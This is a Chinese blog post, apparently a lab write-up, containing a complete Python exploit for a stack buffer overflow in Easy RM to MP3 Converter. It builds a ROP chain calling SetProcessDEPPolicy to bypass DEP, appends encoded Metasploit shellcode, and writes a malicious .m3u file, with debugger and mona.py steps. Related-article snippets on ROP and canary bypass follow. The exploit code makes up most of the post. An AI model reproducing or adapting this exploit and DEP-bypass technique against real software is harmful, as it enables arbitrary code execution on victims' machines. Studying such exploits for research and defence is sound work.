【缓冲区溢出】EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech

最新推荐文章于 2024-01-19 11:29:35 发布
最新推荐文章于 2024-01-19 11:29:35 发布
阅读量1.6k 收藏
点赞数
分类专栏: shellcode dep rop 文章标签: overflow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bugmeout/article/details/45272889
版权
shellcode 同时被 3 个专栏收录
3 篇文章 0 订阅
订阅专栏
rop
3 篇文章 0 订阅
订阅专栏
dep
2 篇文章 0 订阅
订阅专栏

environment &tools


BOOL WINAPI SetProcessDEPPolicy(
  _In_  DWORD dwFlags              0x00 close dep for this process.
);

return value:1 true 0 false

POC(exp.py)

import struct

junk="A"*25000
junkb="A"*1067


################################################################################

##Register setup for SetProcessDEPPolicy() :
##--------------------------------------------
## EAX = <not used>
## ECX = <not used>
## EDX = <not used>
## EBX = dwFlags (ptr to 0x00000000)         #something wrong when creating rop. should be 0x00,not the &0x00
## ESP = ReturnTo (automatic)
## EBP = ptr to SetProcessDEPPolicy()
## ESI = <not used>
## EDI = ROP NOP (4 byte stackpivot)
##--------------------------------------------

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x77c01498,  # POP EBP # RETN [msvcrt.dll]
      0x90909090,  #for balaance
      0x7c862144,  # SetProcessDEPPolicy() [kernel32.dll]
##      0x7c80dfdd,  # POP EBX # RETN [kernel32.dll] 
##      0x75ff0104,  # &0x00000000 [MSVCP60.dll]
         0x7c80dfdd,            #pop ebx,ret  kernel32.dll
          0xffffffff,
       0x770f9028   ,          #inc ebx,ret        oleaut32.dll
      0x766cbaec,  # POP EDI # RETN [WININET.dll] 
      0x766cbaec,  # skip 4 bytes [WININET.dll]
      0x77dcc5ee,  # PUSHAD # RETN [ADVAPI32.dll] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, 
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO

##generate -b '\x0a\x00\x0d' -t python

buf =  ""
buf += "\xbb\x44\xfb\x26\x2f\xda\xdb\xd9\x74\x24\xf4\x5d\x29"
buf += "\xc9\xb1\x44\x31\x5d\x14\x83\xed\xfc\x03\x5d\x10\xa6"
buf += "\x0e\xff\xc4\xbd\x28\x74\x3f\x35\xfb\xa7\x8d\xc2\xcd"
buf += "\x8e\x96\xa7\x5f\x21\xdc\xc1\x93\xca\x94\x31\x27\x8a"
buf += "\x50\xc2\x49\x33\xea\xe2\x8d\x7c\xf4\x7f\x1d\xdb\x05"
buf += "\xae\x1e\x3d\x65\xdb\x8d\x9a\x42\x50\x08\xdf\x01\x32"
buf += "\xbb\x67\x17\x50\x30\xdd\x0f\x2f\x1d\xc2\x2e\xc4\x41"
buf += "\x36\x78\x91\xb2\xbc\x7b\x4b\x8b\x3d\x4a\x53\x10\x6d"
buf += "\x29\x93\x9d\x69\xf3\xdc\x53\x77\x34\x09\x9f\x4c\xc6"
buf += "\xe9\x48\xc6\xd7\x7a\xd2\x0c\x19\x97\x85\xc7\x15\x2c"
buf += "\xc1\x82\x39\xb3\x3e\xb9\x46\x38\xc1\x56\xcf\x7a\xe6"
buf += "\xba\xb1\x41\x54\xca\x18\x91\x10\x2e\xd3\xdb\x4b\x3f"
buf += "\xaa\xd5\x67\x6d\xdb\x76\x88\x6d\xe4\x01\x32\x96\xa0"
buf += "\x6f\x65\x74\xa5\x08\x89\x5d\x18\xfe\x3c\x62\x63\x01"
buf += "\xc9\xd8\x94\x95\xa6\x8e\x84\x24\x5f\x7c\xf7\x88\xfb"
buf += "\xea\x82\xa7\x66\x99\xe4\x1b\x4d\x57\x7c\x45\xdb\x98"
buf += "\x2b\x8d\x6d\xa4\x84\x36\xc5\x8b\x68\xf4\x91\xd0\x56"
buf += "\x56\x76\x89\x69\xa9\x79\x22\xf9\x2d\xde\x93\x6d\xac"
buf += "\xb9\xb6\x2f\x46\x0b\x5c\xc3\xe5\xa2\x45\xab\x55\xe1"
buf += "\x73\x25\x86\x81\xdb\x15\x68\x72\xb4\x18\x3b\x34\x65"
buf += "\xcb\xc9\xd7\x08\x2b\x45\x47\xff\x0b\xf3\xff\xb7\x2e"
buf += "\x97\x93\x76\x78\xef\x20\x5d\x6a\x66\x59\xac\x58\x2a"
buf += "\xc9\x9e\x0e\x35\x3d\x11\x6f\x99\x41\x07\x67"

rop_chain = create_rop_chain()
shellcode =junk+junkb +rop_chain+buf


print shellcode

注意:

step1: In immunity debugger
!mona.py pattern_create 5000
!mona.py pattern_offset XXXX
获取偏移地址,精确覆盖。
还需要确定覆盖的函数返回地址用的是retn还是retn4,最终确定是retn4,构造rop链的时候就需要注意了。

step2:In immunity debugger
!mona.py rop -m *.dll -cp nonull
使用mona生成自动化rop链,地址中不包含空字符。
1G内存,在虚拟机中,花了我整整40分钟,没想到得到的结果细节上还是错的。
建议:将来使用的时候对某一个dll进行关键测试,剩下的自己补充,这样快一点。
错误:本此测试生成的rop链是错误的,因为没有考虑到dll的重定位问题,在测试的时候加上参数 -cm rebase即可解决。

step3:find the addr of some instruction (eg)
!mona asm -s ‘inc edx#ret’
返回指令的机器码
!mona find -s “机器码” -m aim.dll

step4:优化rop链

##Register setup for SetProcessDEPPolicy() :
##--------------------------------------------
## EAX = <not used>
## ECX = <not used>
## EDX = <not used>
## EBX = dwFlags (ptr to 0x00000000)         #something wrong when creating rop. should be 0x00,not the &0x00
## ESP = ReturnTo (automatic)
## EBP = ptr to SetProcessDEPPolicy()
## ESI = <not used>
## EDI = ROP NOP (4 byte stackpivot)
##--------------------------------------------

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x77c01498,  # POP EBP # RETN [msvcrt.dll]
      0x90909090,  #for balaance
      0x7c862144,  # SetProcessDEPPolicy() [kernel32.dll]
##      0x7c80dfdd,  # POP EBX # RETN [kernel32.dll] 
##      0x75ff0104,  # &0x00000000 [MSVCP60.dll]
         0x7c80dfdd,            #pop ebx,ret  kernel32.dll
          0xffffffff,
       0x770f9028   ,          #inc ebx,ret        oleaut32.dll
      0x766cbaec,  # POP EDI # RETN [WININET.dll] 
      0x766cbaec,  # skip 4 bytes [WININET.dll]
      0x77dcc5ee,  # PUSHAD # RETN [ADVAPI32.dll] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  1. 首先在rop的第二项中填充了0x90909090,这是junkcode(垃圾代码),因为ret4(被覆盖的函数返回地址)后,esp会-8,而不是-4
  2. 函数调用不对,使用的应该是ebx为0,而不是用ebx记录0的位置。所以改写成了pop ebx,ret inc ebx,ret
  3. (不能写0,会被截断)。 体会pop ebi 和skip 4 bytes使用同一个地址的作用,非常有意思。体会pushad带来的好处。
  4. 测试过程中如何测试,给rop第一条指令地址下断点,跟踪,紧跟esp变化,分析出来执行开始前的esp,不要跟错了。

show time

C:\Documents and Settings\Administrator\桌面>exp.py >crash.m3u

drag the file to the software.
PWN!!!!!!!
exploited.

BugMeOut
关注
专栏目录
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
m0_64973256的博客
01-20 936
一.简介 软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:攻击者不需要获取内网访问权或本地访问权 身份认证:漏洞利用无需身份认证 二.软件介绍 Adobe Rea...
【逆向学习记录】学习《一步一步学ROP_x86》
卦星的专栏
01-11 1492
1.概述 通过前面三篇文章,学习栈帧,GOT表,PLT表,接下来就可以进行漏洞利用,漏洞利用学习最好的方法就是利用经典,其中经典教学里面最经典的当属蒸米大神的一步一步教学系列 一步一步学ROP之linux_x86篇 – 蒸米 蒸米大神的文章,是实战类型,里面有不少细节的东西,对于我这种没有基础的人来讲,如果不理解是很容易忘记的,因此进行原理上的学习探索 环境:ubuntu 16.04 编译需要在原...
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
EasyRMtoMP3Converter.exe 栈溢出无果之因
weixin_34344677的博客
01-05 145
2019独角兽企业重金招聘Python工程师标准>>> ...
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 434
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
w4y2'blog
04-03 1925
软件链接:http://pan.baidu.com/s/1eQcLbpw 测试环境:xp sp3 看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。   运行程序,界面如图,下方为它的版本号。    
XP、windows2003下提示找不到SetProcessDEPPolicy
weolar的专栏
06-03 261
SetProcessDEPPolicy和Sleep参数个数一样,而且SetProcessDEPPolicy的参数值一般也就是0或者1,我给强制传给Sleep,完全不影响exe的流程。哈哈,这办法真是天才。查了下electron和chromium的代码都没用到这个api,那应该就是crt编译的时候带进去的,可能是exe启动时候调用了一下。我直接搜索exe里的SetProcessDEPPolicy字符串,然后强制改成Sleep。
一步一步学ROP之linux_x86篇
AliMobileSecurity的博客
07-06 5658
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始。
ROP链原理与实战应用
理解ROP链起源 ROP链作为一种高级的内存攻击技术,在计算机安全领域引起了广泛关注。本章将深入探讨ROP链的起源及相关背景知识。 ## 1.1 ROP链的概念 ROP全称为Return-Oriented Programming,是一种利用程序已有...
ROP攻击在网络安全中的应用与风险
ROP攻击的原理是利用程序中已有的代码段(如函数的结尾处的返回指令)来构造一个称为ROP链的恶意代码序列,将这些代码段连接起来,并通过控制程序的执行流程来达到攻击者的目的。 ## 1.3 ROP攻击的历史背景 ROP...
Canary bypass
空舟的博客
05-04 412
Canary bypass 格式化字符串绕过canary 格式化字符串读取canary的值 //字符串泄露canary,最简单常用 Canary爆破(针对有fork函数的程序) fork作用相当于复制出一个相同的程序,逐位爆破canary的值,如果程序崩溃,则不是canary,反之为canary //局限性比较大,必须有fork函数 Stack smashing(故意触发canary_ssp leak) 劫持_stack_chk_fail 修改got表中_stack_chk_fail函数的地址,在
C语言函数调用栈,栈溢出基础,canary和pie保护的绕过思路
最新发布
WdIg-2023的博客
01-19 1102
C语言函数调用栈,栈溢出基础,canary和pie保护的绕过思路
i春秋2020新春战役PWN之BFnote (修改TLS结构来bypass canary)
seaaseesa的博客
02-24 2211
BFnote 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 一开始处,有一个栈溢出漏洞,但是由于开启了canary保护,得想办法绕过canary。下方的堆溢出,不仔细看还发现不了,v4只有一开始被初始化,在循环里,只有i被重新赋值,v4没变,而下方又用到了v4。 这题是可以绕过canary的,这就牵涉到了一个知识点。 在linux下,有一种线程局部存储(Thread ...
使数据区“可执行”的几种常规办法
hambaga的博客
01-21 846
一、VirtualProtect 这个函数可以修改缓冲区的页面属性,传入 PAGE_EXECUTE_READWRITE 让缓冲区可执行。 BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect ); 二、SetProcessDEPPolicy 这个函数可以在运行时修改进程的DEP属性。 BOOL SetProcessDEPPolicy( DWORD
绕过Canary与Canary的泄露
Sakura给爷pwn全场
12-24 268
Canary学习(泄露Canary): https://blog.csdn.net/acsuccess/article/details/104115114 泄露canary: https://blog.csdn.net/qq_38204481/article/details/81076850
Windows溢出保护原理与绕过方法概览
weixin_34262482的博客
05-09 464
By : riusksk(泉哥) Blog: http://riusksk.blogbus.com Data: 2011/3/26 前言 从20世纪80年×××始,在国外就有人开始讨论关于溢出的***方式。但是在当时并没有引起人们的注意,直至后来经一些研究人员的披露后,特别是著名***杂志Phrack上面关于溢出的经典文章,引领许多人步入溢出研究的行列,从此...
DEP和ASLR的原理与破解
wangjiabin2007的专栏
07-10 6163
DEP原理就是在系统的内存页中设置了一个标志位,标示这个内存页的属性(可执行),硬件和系统级支持。 ASLR 原理同一个程序运行时,其相同模块的加载地址是随机的,不是固定在某个地址上。 DEP的绕过(破解)方法。
数据执行保护(DEP)的基本设置
热门推荐
我本善良编程专栏
05-28 1万+
1)执行权限 必须是管理员,而且可以修改boot.ini文件2)数据执行保护DEP的几个可选参数   NOExecute=Optin (为关键Windows程序和服务启用数据执行保护)   NOExecute=Optout (除所选之外,为所有程序和服务启用数据执行保护)   NOExecute=AlwaysOff(关闭数据执行保护功能){选项处于灰色状态}   NOExecute=AlwaysOn(将整个系统置于DEP保护范围以内,所有进程将始终在应用DEP的情况下运行)3)可以通过修改BOOT.INI文
理解和防范:缓冲区溢出基础解析
"缓冲区溢出光速入门 pdf下载" 缓冲区溢出是一种常见的软件安全漏洞,主要发生在使用C或C++等低级编程语言时,由于程序员未正确管理内存,导致程序在处理数据时超出预定的内存边界。当超出边界的数据被写入内存的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值